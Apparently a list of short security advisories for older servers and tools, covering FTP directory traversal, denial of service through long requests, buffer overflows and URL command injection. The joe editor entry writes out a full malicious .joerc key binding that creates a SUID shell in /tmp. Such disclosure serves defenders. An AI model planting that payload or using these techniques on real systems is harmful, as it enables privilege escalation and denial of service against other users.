Submitting an unusually long HTTP request through WEBsweeper will cause the consumption of all available memory on the server where WEBsweeper resides.
A vulnerability in the program could allow elevated privileges on a system with the package installed setuid. Due to insufficent bounds checking, it is possible to execute arbitrary code with the ascdc program. Overflows in the -c, -d, and -m arguments make it possible for a user to overwrite variables on the stack, including the return address, and execute shellcode.
A vulnerability in the program ascdc could allow elevated privileges on a system with the package installed setuid. Due to insufficent bounds checking, it is possible to execute arbitrary code with the ascdc program. Overflows in the -c, -d, and -m arguments make it possible for a user to overwrite variables on the stack, including the return address, and execute shellcode.
A problem with the SlimSoft FTP daemon allows remote users to traverse directories outside of the ftp root. Due to the insufficient checking of input, it is possible for a user to escape the ftp root directory by using relative paths. By requesting a directory change of "..." (three dots), it is possible to gain access to the root directory of the partition the ftp server is running on, and potentially gain access to sensitive system files.
A problem in the handling of HTTP GET requests could allow a remote user to deny service to legitimate users of web services. Upon requesting a long filename from the HTTP server (estimated 80000 characters), the server crashes. Upon ceasing operation, it produces an 'invalid page fault' error. The service will not operate again until SlimServe is manually restarted. It is therefore possible for a malicious remote user to connect to the server and request a long file name, crashing the server, and resulting in a denial of service attack.
A remote user could gain read access to directories outside of the ftp root in a Jarle Aase War FTPD Server. Once a user is logged into the server, a specially crafted 'dir' command will disclose an arbitrary directory. This vulnerability could allow an attacker to gain read access to various files residing on the target machine.
KICQ is an ICQ-compatible interactive messaging client for Unix. Versions of KICQ are vulnerable to remote execution of arbitrary commands embedded in URLs. A maliciously-composed URL containing shell metacharacters and shell commands can be sent in an instant message by an attacker. When the KICQ user clicks this link, the hostile code contained in the URL will execute with the privilege level of the user running KICQ.
A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating.
A problem in the sourcing of the .joerc file could lead to arbitrary execution of commands. By design, joe searches for it's configuration (.joerc) file in three different places. These places are the Current Working Directory (CWD), $HOME/.joerc, and /usr/local/lib/joerc. By creating a custom crafted .joerc file in a world writable directory, a person editing a file in the world writable directory would execute arbitrary commands when starting joe. Therefore, it is possible for a user with malicious motives to create custom crafted joerc files in world writable directories, and execute arbitrary commands as other users. This could be done through social engineering, and potentially lead to elevated privileges. Copying the /usr/local/lib/joerc file to a world writable directory, the following line can be added to create a malicious key binding: :def spellfile filt,"cat >ispell.tmp;ispell ispell.tmp </dev/tty>/dev/tty;cat ispell.tmp;/bin/rm ispell.tmp;cp /bin/zsh /tmp/suid; chmod 4755 /tmp/suid",rtn,retype This will bind the creation of a SUID shell in the /tmp directory to the keys ^[l. This exploit will allow the attacker to assume the identity of the user of joe.
It is possible for a remote user to cause a denial of service condition in Robin Twombly A1 Server by submitting a specially crafted request via a telnet connection, which could cause the A1 server to crash. A restart of the server is required in order to gain normal functionality.
Services By CQR